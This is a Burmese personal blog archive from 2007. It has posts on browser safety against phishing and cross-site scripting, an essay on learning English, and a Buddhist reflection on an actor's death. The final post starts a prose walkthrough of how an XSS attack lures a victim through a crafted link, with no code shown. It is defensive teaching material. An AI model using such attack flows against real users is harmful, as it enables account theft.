  • Internet Explorer အတွက် - eBay Toolbar
  • Firefox/Internet Explorer နှစ်မျိုးလုံးအတွက် Netcraft Anti-Phishing Toolbar, Google Toolbar စသည်တို့မှာ -
လုံခြုံမှုကိုများစွာ အထောက်အပံ့ပေးနိုင်သည့် ကိရိယာများ ဖြစ်ကြသည်။
၎င်းတို့သည် သီးခြား ထည့်သွင်းပေးရသည့် ပရိုဂရမ်များ (Add-ons) များဖြစ်ပြီး -
  • Phishing web site များကို ဖော်ထုတ်ပေးခြင်း၊
  • web site များ၏ အချို့သော အင်္ဂါရပ်များ (Features)ကို ရပ်တန့်ပေးထားခြင်း၊
  • အင်တာနက်သုံးသူများ၏ စကားဝှက် စသည်များကို မသက်ဆိုင်သူများ လက်ထဲသို့ မရောက်အောင် ထိန်းသိမ်းကာကွယ်ပေးခြင်းနှင့်
  • အခြားသော အသုံးဝင်သည့် အကာအကွယ် အမျိုးမျိုးကို ရရှိစေသည်။
Phishing - အီးမေးလ် ကိုအသုံးပြုပြီး အင်တာနက်သုံးသူတစ်ဦးကို အင်တာနက်နေရာ( Web site) အတု တစ်ခုသို့ ရောက်လာအောင်ဖန်တီးကာ credit card, social security, bank စာရင်းအမှတ် စသည့် အရေးကြီးသော အချက်အလက်များကို လှည့်ဖျားရယူသည့် အင်တာနက် ရာဇ၀တ်မှု တစ်မျိုး။
      1. NoScript - https://addons.mozilla.org/firefox/722/
      2. SafeHistory - www.safehistory.com/
      3. SafeCache - www.safecache.com/
      4. Netcraft Anti-Phishing Toolbar -http://toolbar.netcraft.com/
      5. eBay Toolbar -http://pages.ebay.com/ebay_toolbar/
      6. Google Toolbar - www.google.com/tools/firefox/toolbar/index.html

-လိုအပ်သော ပရိုဂရမ်များ နှင့် ကိရိယာများ ထပ်မံပေါင်းထည့်ပေးပါ။



၃. အချို့သော အင်္ဂါရပ်များကို ရပ်တန့်ထားခြင်း
အရိုးစင်းဆုံးပြောရလျှင် အင်္ဂါရပ် (Features) အချို့ကိုသာ အလုပ်လုပ်စေခြင်းသည် အင်တာနက်ထဲတွင် သွားလာရသည့်အခါ ပိုမို စိတ်ချ လုံခြုံသည့် အနေအထားကို ဖြစ်ပေါ်စေသည်။ ပြောရလျှင် JavaScript, Java, Active X, JScript, VBScript,Flash, နှင့် QuickTime တို့အားလုံးမှာ အန္တရာယ်ပေးနိုင်သည့် အရာများ ဖြစ်သည်။ ၄င်းနည်းပညာများသည် အင်တာနက်လူဆိုးများအတွက် လက်နက်ပုံစံသစ်များ ဖြစ်လာ ကြသည်။ မကောင်းသော အချက်တစ်ခုမှာ အဆိုပါ အင်္ဂါရပ်များကို အလုပ်မလုပ်နိုင်အောင် ရပ်တန့်ထား ခြင်းသည် အချို့သော Web site များ၏ အလုပ်လုပ်မှု အနေအထားကို ရပ်တန့်စေခြင်း၊ တ၀က်တပျက်သာ အလုပ်လုပ်စေခြင်း စသည်တို့ ဖြစ်ပေါ်လာစေနိုင်သည်။
မည်သို့ပင် ဖြစ်စေ ၄င်းတို့ကိုရပ်တန့်ထားခြင်းက ပို၍ အကျိုးများစေသည်။ ထို့ကြောင့် အချို့သော အင်တာနက်ကြည့်ဆော့ဖ်ဝဲများ နှင့် ၄င်းတို့၏ နောက်ဆက်တွဲများ (Extensions) သည် အထက်တွင်ဖော်ပြခဲ့သည့် အင်္ဂါရပ်များကို လိုအပ်သလို ဖွင့်/ပိတ်ခြင်းများကို အလျင် အမြန် ဆောင်ရွက်ပေးနိုင် အောင်ဖန်တီးထားခြင်းဖြစ်သည်။

-အန္တရာယ်ပေးနိုင်သော အချို့အရာများ (JavaScript, Java, Active X, JScript, VBScript, Flash, နှင့် QuickTime) ကို မဖြစ်မနေ လိုအပ်မှသာ အလုပ်လုပ်ပါစေ။ မလိုအပ်က ရပ်ထားပါ။


၎. ကွန်ပျုတာ စက်အတု (Virtual Machine) တစ်ခုကို သုံးခြင်း
ယခုအခါ ကွန်ပျုတာ စက်အတု (Virtual Machine) ကဲ့သို့သော အတုဖန်တီးထားသည့် နေရာများမှတဆင့် အင်တာနက်ကို အသုံးပြုနေသူများ တနေ့ထက်တနေ့ တိုးတက် များပြားလာနေပြီ ဖြစ်သည်။ အကယ်၍ အခြေအနေ တစ်ခုခု ထူးခြားမှုဖြစ်ပေါ်လာပါက စက်အတုထဲတွင်သာ ပြဿနာ တက်မည်ဖြစ်ပြီး ပင်မ ကွန်ပျုတာကို ထိခိုက်မှု မရှိနိုင်ပေ။
ကွန်ပျုတာ စက်အတု (Virtual Machine) - တကယ့် ကွန်ပျုတာတစ်လုံးကဲ့သို့ အလုပ်လုပ်ပေးနိုင်သော ကွန်ပျုတာ ဆော့ဖ်ဝဲတစ်မျိုး၊ Operating System တစ်ခု ထည့်သွင်းတပ်ဆင်ပေးရသည်။ အခြားသော ဆော့ဖ်ဝဲများလည်း ထည့်သွင်းနိုင်သည်။
-မိမိအကျွမ်းတ၀င်မရှိသော Web site များ၊ ဆော့ဖ်ဝဲများကို စမ်းသပ် အသုံးပြုရသည့်အခါ ဘေးကင်းစေရန် အတွက် ကွန်ပျုတာ စက်အတု (Virtual Machine) ကို အသုံးပြုပါ။


၅. အီးမေးလ် အတွင်းရှိ အင်တာနက် လိပ်စာများကို ဘယ်တော့မှ ကလစ်မလုပ်ပါနှင့်
အီးမေးလ်အတွင်းပါဝင်လာသည့် -
  • လိပ်စာနှင့် အင်တာနက်နေရာများ၊
  • ရုပ်ပုံများ ကို တတ်နိုင်သမျှ မည်သည့် အချိန်တွင်မှ ကလစ်မလုပ်ပါနှင့်။
  • ၄င်းလိပ်စာများသည်ပင် အန္တရာယ်ဖြစ်နေပြီး၊
  • Phishing အီးမေလ်များကို ရှာဖွေ ဖော်ထုတ်နိုင်ရန်မှာလည်းခက်ခဲသည်။
အကယ်၍ အီးမေးလ်တစ်စောင်သည် အစစ်အမှန်ဖြစ်ကြောင်း မသေချာပါက၊ ဆောင်ရွက်နိုင်သည့် အကောင်းဆုံးနည်းမှာ ပေးထားသော လိပ်စာကို အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ၏ လိပ်စာဖေါ်ပြသည့်နေရာတွင် ကိုယ်တိုင်ရိုက်ပြီး ထည့်သွင်းခြင်းဖြစ်သည်။ ဤနည်းအားဖြင့် မိမိရောက်သွားမည့်နေရာသည် အစစ်အမှန်နေရာတစ်ခု ဖြစ်ကြောင်း အတော်အတန် အာမခံချက် ရရှိနိုင်ပေသည်။

ချွင်းချက် တစ်ခုတော့ ထားရှိရမည် ဖြစ်သည်။
ဥပမာအားဖြင့် မိမိ၏လုပ်ဆောင်မှု တစ်ခုကို တုန့်ပြန်ပေးရန် ချက်ချင်း ပေးပို့လာသော အီးမေးလ်များ
(Web site တစ်ခုတွင် မှတ်ပုံတင်ခြင်း၊ စကားဝှက် မေ့သွားခြင်း ကြောင့် ပြန်တောင်းခြင်း/ပြန်ပြင်ခြင်း၊ ကုန်ဝယ်အမှာစာ အတည်ပြုခြင်း .. စသည်) ကို မိနစ်ပိုင်းအတွင်း ပြန်လည် တုန့်ပြန် ဆောင်ရွက်ပေးရသည့် အခါမျိုး အတွက် ဖြစ်သည်။
-မိမိ၏ လိုအပ်ချက်ကြောင့် ချက်ချင်းရောက်လာပြီး ချက်ချင်းတုန့်ပြန်ပေးရမည့် အီးမေးလ်များအတွင်းရှိ လိပ်စာများမှ အပ၊ အခြားမည်သည့် အီးမေးလ်များအတွင်းရှိ လိပ်စာများ၊ ပုံများ ကိုမဆို ကလစ် မလုပ်ပါနှင့်။


၆. မိမိ၏ Web mail ကို ကာကွယ်ထားပါ
လူသန်းပေါင်းများစွာတို့သည် နည်းအမျိုးမျိုးဖြင့် Web mail များကို အသုံးပြုလျက် ရှိနေကြသည်။ ၄င်းကို မိမိ၏ ဘဏ်စာရင်း နံပါတ် ထက်ပင် လျှိုဝှက် သိမ်းဆည်းထားသင့်ပေသည်။ လူပေါင်းများစွာတို့သည် အရေးကြီးသော အင်တာနက် ပေါ်မှ Account များကို Web mail လိပ်စာ တစ်ခုတည်းဖြင့် ရယူ သိမ်းဆည်း ထားတတ်လေ့ရှိကြသည်။ အကယ်၍ တစ်စုံတစ်ယောက်က မိမိ၏ အီးမေးလ်လိပ်စာကို နည်းလမ်းတစ်ခုခုဖြင့် အသုံးပြုနိုင်သွားမည်ဆိုပါက ထိုသူသည် ၄င်းအီးမေးလ်တွင် ချိတ်ဆက်ထားသော အခြားသော Account များကိုပါ သုံးခွင့်ရသွားမည် ဖြစ်သည်။

သင့်အနေဖြင့် ဆောင်ရွက်နိုင်သည့် အကောင်းဆုံးအရာတစ်ခုမှာ -
  • အလွယ်တကူ မခန့်မှန်းနိုင်သော စကားဝှက်မျိုးကို အသုံးပြုခြင်း၊
  • စကားဝှက်များကို အနည်းဆုံး ၃ လတစ်ကြိမ် ပြောင်းလဲခြင်း၊
  • ၄င်းစကားဝှက်ကို အခြားမည်သည့်နေရာတွင်မှ မသုံးခြင်း၊
  • အလုပ်အမျိုးမျိုးအတွက် အီးမေးလ် လိပ်စာ အဆင့်အတန်းအမျိုးမျိုးထားရှိ အသုံးပြုခြင်း တို့ ဖြစ်သည်။
အရေးကြီးသော အချက်အလက်များပါဝင်နေသည့် မည်သည့် အီးမေးလ်ကိုမဆို ဖတ်ရှုပြီးသည့်အခါ ဖျက်ဆီးပစ်လိုက်ခြင်း သည်လည်း ကောင်းမွန်သော လုပ်ဆောင်ချက် တစ်ခု ဖြစ်သည်။
-မိမိ၏ အီးမေးလ် စကားဝှက် ကို ကောင်းစွာ ကာကွယ်ထားပါ။ အရေးကြီးသော အကြောင်းအရာများကို အီးမေးလ် Inbox ထဲတွင် သိမ်းမထားပါနှင့်။ အများနှင့် သက်ဆိုင်သော၊ လူများစုအတွက် ချပေးရမည့် အီးမေးလ်လိပ်စာကို အခြား အရေးကြီးသော နေရာများတွင် မသုံးပါနှင့်။


၇. ရှည်လျားသော အင်တာနက်လိပ်စာများကို သတိထားပါ
အကယ်၍ အင်တာနက်လိပ်စာ တစ်ခုသည် စာကြောင်း တစ်ကြောင်းထက်ပိုမိုရှည်လျားပြီး၊ ရာခိုင်နှုန်း သင်္ကေတများ % ဖြင့် ပြောင်းလဲ ဖော်ပြထားပါက အထူးသတိပြုသင့်သည်။ အကယ်၍ အင်တာနက်လိပ်စာ တစ်ခု၏ သဘာဝ အမှန်ကို မသိပါက ၄င်းတို့ကို မူရင်း သင်္ကေတ အဖြစ် ပြန်ပြောင်းပြီး အတွင်းတွင် HTML သင်္ကေတများ ပါဝင်နေခြင်း ရှိမရှိ စစ်ဆေးပါ။

-HTML သင်္ကေတများ ပါဝင်နေပါက ၄င်းလိပ်စာကို ကလစ်မလုပ်ပါနှင့်။


၈. URL အတိုချုံးပေးသော ၀န်ဆောင်မှုများ
URL အတိုချုံးပေးသော ၀န်ဆောင်မှုများကို သတိထားပါ။ အချို့သော အင်တာနက်လူဆိုးများသည် မိမိတို့၏ ကောက်ကျစ်သော အင်တာနက်လိပ်စာများကို ကွယ်ဝှက်နိုင်ရန်အတွက် TinyURL, snipURL, notlong, shorl, နှင့် doiop တို့ကဲ့သို့သော အင်တာနက်လိပ်စာ ပြောင်းပေးသည့် ၀န်ဆောင်မှုများကို သုံးလေ့ရှိကြသည်။ ထိုကဲ့သို့သော လိပ်စာများကို စစ်ဆေးနိုင်ရန်အတွက် လိုအပ်ပါက Command Line ထဲတွင် ရိုက်ထည့်ပြီး တိုက်ရိုက် စစ်ဆေး ကြည့်နိုင်သည်။ အကယ်၍ လိပ်စာ အစစ်အမှန်ဖြစ်ပါက အမှန်အတိုင်းလမ်းညွှန်မည် ဖြစ်သည်။ ယခုကဲ့သို့ လိပ်စာပြောင်းပေးသော ၀န်ဆောင်မှုများသည်လည်း ၄င်းတို့ထံရောက်လာသော လိပ်စာ မှန်မမှန်ကို အာမခံနိုင်မည် မဟုတ်ပေ။
-ထို့ကြောင့် မည်သည့် နေရာကိုမဆို ကလစ် လုပ်တော့မည်ဆိုပါက အထူးသတိထားရန်လိုမည် ဖြစ်ပေသည်။ မသိသော၊ သံသယရှိနေသော လိပ်စာများကို ကလစ်မလုပ်ပါနှင့်။


သတိပြုစေလိုသည်မှာ - ယခုဖော်ပြထားသော အချက်များ သည်လည်း မိမိတို့ကို အတော်အသင့် မျှသာ အကာအကွယ်ပေးနိုင်မည်ဖြစ်ပြီး ရာနှုန်းပြည့် အကာအကွယ် ပေးနိုင်မှုအတွက် သက်ဆိုင်သူ တစ်ဦးချင်းစီ အနေဖြင့် အမြဲမပြတ် ဆက်လက် လေ့လာသွားရန် အထူးပင် အရေးကြီးလှပါကြောင်း -


REF -
- http://en.wikipedia.org/wiki/Xss
- http://www.cgisecurity.com/articles/xss-faq.shtml
- XSS Attacks - CROSS SITE SCRIPTING EXPLOITS AND DEFENSE by Syngress

Jul 21, 2007

အင်္ဂလိပ်စာ အရေးကြီးပုံ - Importance of English


ချင်းတွင်းမဂ္ဂဇင်းထဲကပါပဲ နောက်ထပ်တစ်ပုဒ်ဖတ်မိတာကတော့ အထူးဆောင်းပါးအနေနဲ့ ဖော်ပြထားတဲ့ ဒေါက်တာဒေါ်မြင့်မြင့်ခင်ရဲ့ ဆောင်းပါး တစ်ပုဒ်ပါ ...
နှစ်သက်မိတာနဲ့ အမျှ ရင်ထဲမှာပါ ထိရှခံစားမိရတာမို့ ရောင်းရင်း တွေကို ထပ်ဆင့် ဝေမျှလိုက်ပါတယ် ...

အင်္ဂလိပ်စာတတ်ဖို့က သိပ်အရေးကြီးတယ်။
ဒီအဆိုဟာ အကြိမ်ကြိမ်အဖန်ဖန် တဖွဖွပြောနေတော့ ကြားရတဲ့သူသာ နားငြီးသွားမယ်၊ လေးနက်မှုကတော့ လျော့မသွားဘူး။ နောင်တစ်ခေတ် တစ်ခါမှာ အခြားဘာသာက အင်္ဂလိပ်ရဲ့ နေရာကို ယူသွားမှာ ဖြစ်နိုင်ပေမယ့် အခုမျက်မှောက်အတွက်တော့ အင်္ဂလိပ်သာလျှင် ကမ္ဘာမှာ မင်းမူနေတဲ့ စကားပဲလို့ ဆိုရမယ်။ ဒီတော့ အပြိုင်အဆိုင် လောကဖြစ်တဲ့ ဂလိုဘယ်လိုက်ဇေးရှင်း ကြိုးဝိုင်းထဲ ၀င်ချင်လျှင်တော့ ပြည်သူပြည်သားတွေဟာ အင်္ဂလိပ်စာကို ကောင်းကောင်းပိုင်ရတော့မယ်။

သိပ္ပံပညာတတ်ဖို့ရာမှာလည်း ဒီလိုပါပဲ အင်္ဂလိပ်စာ မတတ်သူ (တဲ့တိုင်းပြည်) ဟာ နောက်လိုက် တိုင်းပြည်ပဲ ဖြစ်တော့မယ်။ မြန်မာဟာ တစ်ခါက အိန္ဒိယ၊ မလေးရှား၊ စင်္ကာပူ၊ ဟောင်ကောင်တို့လို အင်္ဂလိပ်စာမှာ အဆင့်မြင့်ခဲ့ပေမည့် အခုတော့ ဒီလိုမဟုတ်တော့ပါဘူး၊ အရင်က အင်္ဂလိပ်စာ အဆင့်မမြင့်လှတဲ့ အိမ်နီးချင်းနိုင်ငံတွေထက် နောက်ကျနေလို့ မီအောင် မနည်းလိုက်ယူရမှာ။

အခု အသက် ၇၀ ကျော် ၈၀ နီးပါး ပညာတတ်တွေလို အင်္ဂလိပ်စာအဆင့်
အခုလူအများရှိရင် အင်မတန်ကောင်းမှာ။ ဒါလည်း အချိန်တို အတွင်းမှာ ဖြစ်လာနိုင်ပါတယ်။
ဆရာမကြီး ပြောတဲ့ စကားလေးတွေက အားလုံးကို ကြိုးစားကြဖို့ တိုက်တွန်းနေတာပါ။
ဒီနေရာမှာ ကျွန်တော့်ရဲ့ အမြင်လေးကို ဖြည့်စွက် ချင်ပါသေးတယ် ....
လူပုဂ္ဂိုလ် တစ်ဦး တစ်ယောက် ၊ သူတတ်ချင်တဲ့ ပညာတွေတတ်လာဖို့ ဆိုတဲ့နေရာမှာ အဓိက အရေးအကြီးဆုံး အချက်ကတော့ အဲဒီ - ပညာတွေကို လေ့လာဆည်းပူး တတ်မြောက်ချင်တဲ့ စိတ်ကလေးကို မိမိအနေနဲ့ ဘယ်လို အခြေအနေမျိုးမှာ ရောက်နေပါစေ၊ ရင်ထဲကနေ ပျောက်ပျက်မသွားအောင် ထိန်းသိမ်း မွေးမြူသွားမယ် - ဆိုရင် လိုချင်တဲ့ ပညာတွေကို အချိန်တစ်ခု ကြာတဲ့ အခါမှာ အမှန်တကယ် သင်ယူရရှိ နိုင်လာတယ် - ဆိုတာလေးပါပဲ ...

ရည်ညွှန်း
- သိပ္ပံပညာ အဆင့်မြင့်ရေးနှင့် သိပ္ပံပညာတတ်များ ပြုစုပျိုးထောင်ပေးရေး - ဆောင်းပါး
- ဒေါက်တာ ဒေါ်မြင့်မြင့်ခင်
- ချင်းတွင်းမဂ္ဂဇင်း ၊ အမှတ်(၁၉)၊ သြဂုတ် ၂၀၀၇ - စာ(၁၀၀-၁၀၉)

သိခြင်း၊ ဝေငှခြင်း၊ ကျင့်ခြင်း


ကျွန်တော် ကွန်ပျုတာနား မကပ်နိုင်ဖြစ်နေသောကြောင့် အကြောင်းအရာ အသစ်မတင်ဖြစ်ခဲ့ပါ ....
လာရောက်လည်ပတ်နေကြ ရောင်းရင်း၊ သူငယ်ချင်းများကို အထူးပင် အားနာမိပါသည် ....

သို့သော်လည်း ရသမျှအချိန်တွေမှာ စာအုပ်တွေတော့ ဖတ်ဖြစ်နေသည့်အတွက် ....
ရေးလက်စ တပိုင်းတစများကို လက်စမသတ်နိုင်မီ နှစ်သက်မိသော အကြောင်းအရာအချို့ကို
ဖောက်သည်ချ ဝေငှလိုက်ပါသည် ....

  • တာဝန်သိသော တစ်ဦးချင်းကို ရှေ့တန်းတင်သော ၀ါဒ၊
  • သန့်ရှင်းသော လူ့ဆက်ဆံရေး၊
  • လူထုကို ကိုယ်စားပြုသော ဒီမိုကရေစီ၊
  • လူ့ယဉ်ကျေးမှုကြီးကို အားလုံးပါဝင် တည်ထောင်ခြင်း -- ယင်းအရာအားလုံးကို ကျွန်တော်တို့ မလိမ္မာက မလုပ်နိုင်။
ပထမ - ဖြစ်တန်ရာကို သာမန်အသိဖြင့် သိရမည်။
ဒုတိယ - ဗဟုသုတကို ဝေငှလျက် အခြားသူများလည်း သိအောင် လုပ်ရမည်။
တတိယ - သိသည့်လျော်စွာ ကျင့်ရမည်။

Responsible individualism, healthy human relationships, representative democracy, an inclusive approach toward civilization _ all of these are impossible if we are unable, frist, to invoke our common sense of what is probable, second, to do so with others as part of our shared knowledge, and third, to act accordingly.

John R Saul

ချင်းတွင်းမဂ္ဂဇင်း ၊ အမှတ်(၁၉)၊ သြဂုတ် ၂၀၀၇ - စာ(၅)

Jul 12, 2007

မသေခင်ဘာလုပ်ကြမလဲ - (ကိုသားကြီး အမှတ်တရ)


ဒီနေ့ သတင်းစာမှာ ကျွန်တော်တို့ ချစ်တဲ့ သရုပ်ဆောင်တစ်ဦးဖြစ်တဲ့ ကိုသားကြီး (ဒွေး) ရဲ့နာရေးသတင်း ဖတ်လိုက်ရတယ် ....

သြော် ... တစ်ယောက်တော့ သွားရှာပြန်ပြီ ...
လို့တွေးလိုက်မိရင်း ... ဘယ်လိုသေတာလဲ လို့မေးကြည့်လိုက်တော့ ဦးနှောက်သွေးကြောပြတ်တာလို့ တစ်ယောက်က ပြောနေတာ ကြားလိုက်ရတယ် ...
တစ်ဆက်တည်းမှာဘဲ ကောင်းတာပေါ့ ဝေဒနာ မခံစားလိုက်ရတော့ဘူးပေါ့ ...
ဆိုတဲ့ အသံတစ်သံပါ ထပ်ပြီး ကြားမိလိုက်တယ် ....

ကျွန်တော်ကတော့ အဲဒီလိုမတွေးမိလိုက်ဘူး ...
ကိုသားကြီးတစ်ယောက် ကောင်းရာသုဂတိလားပါစေ
လို့ ဆုတောင်းပေးလိုက်မိရင်း ...
အသေမှ ဖြောင့်သွားရဲ့လား ကိုသားကြီးတစ်ယောက် ..
လို့ ကိုယ့်ဘာသာကို ပြန်မေးနေမိတယ် ....
ဦးနှောက်သွေးကြောပြတ်ပြီး သေဆုံးသွားရိုးသာမှန်ကန်ခဲ့ရင် သူ့ခမျာ သေမယ်ဆိုတာ ကြိုသိမှာမဟုတ်လိုက်ဘူး .. ကြိုတင်ပြင်ဆင်ချိန် ရလိုက်မှာ မဟုတ်ဘူးလို့လည်း တွေးလိုက်မိပါတယ် ... (ရချင်လည်းရမှာပေါ့နော် ... )

တကယ်တော့ ဒီလမ်းဟာ ကျွန်တော်တို့ အားလုံး
တစ်နေ့မှာ သွားကိုသွားကြရမယ့် ခရီးလမ်းတစ်ခုလည်း ဖြစ်ပါတယ် ...
ဘယ်သူမဆို တစ်နေ့ငါသေရမယ်ဆိုတဲ့ အတွေး ရှိတတ်ကြပေမယ့် အများစုကတော့ လောလောဆယ်တော့ ငါမသေနိုင်သေးပါဘူးလေ ဆိုတဲ့ အတွေးလေးကတော့ တဆက်တည်း တွေးမိတတ်ကြတာပါပဲ ... အဲလိုတွေးမိတဲ့နောက်မှာ အတွေးလမ်းကြောင်းက နောက်တစ်နေရာကို ရွေ့သွားတတ်ကြပါတယ် ....

ကျွန်တော်လည်း ဒီ - တစ်နေ့သေရမယ်ဆိုတဲ့ ကိစ္စကို မကြာခဏ တွေးမိတတ်ပါတယ် ... အဲဒီလိုတွေးမိလိုက်တဲ့ အခါတိုင်း အရင်ဆုံးမေးမိတာကတော့ ငါဘာတွေလုပ်ပြီးပြီလဲ သေဖို့အတွက်ရော ... အဆင်သင့်ဖြစ်နေပြီလား ... မိသားစုအတွက်၊ တိုင်းပြည်အတွက်၊ ဘာသာ သာသနာအတွက် တတ်စွမ်းသလောက် ဘာတွေလုပ်ခဲ့ပြီလဲ အဲဒီလို အတွေးတွေက အလိုလိုဝင်ဝင်လာတတ်ပါတယ် ... တကယ်တမ်းမှာ ဘာတစ်ခုမှ ဟုတ်တိပတ်တိ တာဝန်မကျေသေးသလို ခံစားရမိတယ် ...

မိဘအပေါ်မှာ အတိုင်းအတာတစ်ခုအထိ တာဝန်ကျေခဲ့ပြီဖြစ်ပေမယ့် မိဘတွေ အိုမင်းမစွမ်း ဖြစ်လာချိန်မှာ လိုအပ်တာမှန်သမျှ မလစ်ဟင်းရအောင် ဖြည့်ဆည်းပေးနိုင်ဖို့ ကျွန်တော့်မှာ အဆင်သင့် မဖြစ်သေးပါဘူး ... ကိုယ်တိုင်တောင် လူတန်းစေ့ရုံလေး ရပ်တည်နေနိုင်ရုံပဲ ရှိပါသေးတယ် ... တကိုယ်ရေမို့ ဒီလောက် ရပ်တည်နေနိုင်တာပါ ... ကိုယ်ချစ်တဲ့ မိန်းကလေး တစ်ယောက်ကို အတူနေထိုင်ကြဖို့ ကမ်းလှမ်းနိုင်ဖို့ဆိုတာ အတော်လေး ဝေးပါသေးတယ် ...

ဒါဆိုရင်တိုင်းပြည်အတွက်ရော ...
ကျွန်တော်အသက်အရွယ်အရ အဆင့်အတန်းအရ အတိုင်းအတာတစ်ခုထိတော့ အလုပ်လုပ်ပေးနိုင်ခဲ့ပြီလို့ တွေးမိပါတယ် ... ကွန်ပျုတာအကြောင်း ဘာမှမသိတဲ့သူ အယောက် ၁၀၀၀ ကျော်နီးပါးလောက်ကို ကွန်ပျုတာအကြောင်း စိတ်ဝင်စားလာအောင် ကိုင်တွယ်ရဲလာအောင် ကိုယ်တိုင် လေ့လာတတ်လာအောင် လေးနှစ်လောက် အတွင်းမှာ အခြေခံလောက် သင်ပေးနိုင်ခဲ့ပါတယ် ... ဆယ်ဂဏန်းလောက်ကိုတော့ ဒီထက် အဆင့်မြင့်တဲ့ အကြောင်းအရာအချို့ကို လက်ဆင့်ကမ်းနိုင်ခဲ့ပါတယ် ... စိတ်ဝင်စားတဲ့ ကွန်ပျုတာဘာသာရပ်အချို့ကို မြန်မာဘာသာပြန်ခဲ့ပါတယ် အဲဒီစာအုပ်တွေဟာ အခုထိတော့ လက်ရေးမူ အကြမ်းထည်တွေဖြစ်နေပေမယ့် အချိန်တစ်ခုမှာတော့ အသုံးတည့်မယ့်သူတွေလက်ထဲ ရောက်သွားမယ်လို့ ယုံကြည်နေမိပါတယ် ... လောလောဆယ်မှာလဲ အများအတွက် အသုံးဝင်နိုင်မယ့် အချို့သော အကြောင်းအရာတွေကို အင်္ဂလိပ်ဘာသာကနေ မြန်မာဘာသာကို တတ်နိုင်သလောက် ဘာသာပြန်ပြီး ပတ်ဝန်းကျင်ကို ဝေမျှနေမိပါတယ် ...

အင်တာနက် သုံးနေရတဲ့အတွက် Online ပေါ်မှာ အခမဲ့ ရနိုင်သမျှ အားလုံးကို ရှာဖွေအသုံးချပြီး အများအကျိုးရှိမယ့် ကိစ္စတွေမှာ သုံးနေ ဝေငှနေ မိတယ် ... ကမ္ဘာကျော်တက္ကသိုလ် ကြီးတွေက အင်တာနက်ပေါ်မှာ ဖွင့်ထားတဲ့ သူတို့ရဲ့ အွန်လိုင်း စာသင်ခန်းတွေကို မွှေနှောက်ရင်း သင်ခန်းစာတွေကို Download လုပ်နေမိတာ ကလဲ တစ်နေ့တစ်နေ့ အချိန်မနည်းပါဘူး ... ကျွန်တော်သိထားတာတွေ လုပ်ပေးချင်တာတွေ ချစ်တဲ့ ရောင်းရင်း ညီအကိုတွေအားလုံးကို ဝေငှပေးချင်တာတွေနဲ့ ရတဲ့ အချိန်က တစ်ခါတစ်လေ မမျှသလို ခံစားရတယ် ... တစ်ဘက်မှာလည်း စားဝတ်နေရေးအတွက် တာဝန်တွေက ရှိနေသေးတာကိုး ...

ဘာသာတရားဘက်မှာလည်း တတ်စွမ်းသမျှ
လူတွေ ဘာသာရေးကို စိတ်ဝင်စားလာအောင် စည်းရုံးမိပါတယ် ...
မြတ်ဗုဒ္ဓရဲ့ တရား ဓမ္မတွေကို လူတွေသိလာအောင်
တတ်နိုင်တဲ့ ဘက်ကနေ လမ်းပြပေးနိုင်ဖို့ ကြိုးစားနေမိပါတယ် ...
ရခဲလှတဲ့လူ့ဘ၀တိုတိုလေးအတွင်းမှာ တတ်နိုင်သလောက် အများအတွက်
အကျိုးကျေးဇူးဖြစ်ပေါ်စေမယ့် အရာမျိုးတွေပဲ လုပ်သွားချင်တယ်ဗျာ ...

နောက်ဆုံးတွေးမိတာလေးတစ်ခုကတော့ ကိုယ့်အကြောင်းပါဘဲ ...
  • ကိုယ့်အတွက်ရော ကိုယ်တိုင်ဘာတွေလုပ်ခဲ့ပြီးပြီလဲ ...
  • သေဖို့ အတွက်ရော အဆင်သင့်ဖြစ်နေပြီလား ...
  • သေရင် ကိုယ့်နောက်ပါလာမယ့် အလုပ် ဘယ်လောက်လုပ်ခဲ့ပြီလဲ ...
အဲဒါလေးတွေ ပြန်တွေးနေမိပါတယ် ...
သေရင် ကိုယ့်နောက်ပါလာမှာက ဒါန သီလ ပဲရှိသလို
ဒီသံသရာ ၀ဋ်ဆင်းရဲကြီးထဲကနေ အမြန်လွတ်မြောက်အောင် လုပ်ပေးနိုင်တာကလဲ ဘာဝနာ အလုပ်ပဲရှိတာမို့ ...
  • အမြန်ဆုံး လုပ်သွားရမယ် ...
  • တတ်နိုင်သမျှ အချိန် နေရာမရွေး လုပ်သွားရမယ် ....
  • ရောင်းရင်းမိတ်ဆွေတွေကိုလည်း တတ်အားသမျှ တိုက်တွန်းနှိုးဆော်သွားရမယ် .. .
လို့တွေးနေမိရင်း ဒီစာလေးကို ချရေးမိသွားပါတယ် ....
ပြည်သူချစ်တဲ့ ကိုသားကြီးတစ်ယောက် ကောင်းမွန်တဲ့ ဘုံဘ၀မှာ ရောက်ရှိနေထိုင်နိုင်ပါစေလို့ ဆုတောင်းပေးရင်း ပြုခဲ့သမျှ ကောင်းမှုကုသိုလ်တွေကိုလည်း အမျှပေးဝေမိပါတယ် ...

ရည်ညွှန်း-
(၁) မသေခင်ဘာလုပ်ကြမလဲ - အရှင်ဆန္ဒာဓိက
(၂) မသေခင်ဘာလုပ်ကြမလဲ - Blog post

Jul 10, 2007

XSS သို့မဟုတ် Cross-Site Scripting -တိုက်ခိုက်မှု နမူနာများ


XSS တိုက်ခိုက်မှု နမူနာများ

XSS ဂယ်ပေါက် အမျိုးမျိုးရှိနေသည့်အတွက် တိုက်ခိုက်သူများ၏ လုပ်ဆောင်ပုံများမှာလည်း အမျိုးမျိုး ဖြစ်လာနိုင်သည်။
တိုက်ခိုက်မှုနမူနာများကို လေ့လာကြည့်ကြပါစို့ ...

အားနည်းချက် (၁)-တိုက်ခိုက်မှု

  1. တိုက်ခိုက်သူသည် သားကောင်ဆီသို့ အီးမေးလ် သို့မဟုတ် အခြားသော နည်းလမ်းတစ်ခု ဖြင့် ကောက်ကျစ်စွာဖန်တီးထားသော အင်တာနက်စာမျက်နှာ တစ်ခုကို ဖွင့်ပေးမည့် အင်တာနက်လိပ်စာ (ဥပမာ - --www.attackexample.com/test/readme.html-- )တစ်ခုကို ပေးပို့လိုက်သည်။
  2. သားကောင်က ထို လိပ်စာကို နှိပ် လိုက်သည်။ (click လုပ်လိုက်သည်။) ဤတွင် တိုက်ခိုက်သူ၏ ဖန်တီးထားသောအင်တာနက် စာမျက်နှာမှာ သားကောင်၏ အင်တာနက်ကြည့်ဆော့ဖ်ဝဲတွင် ပွင့်လာသည်။
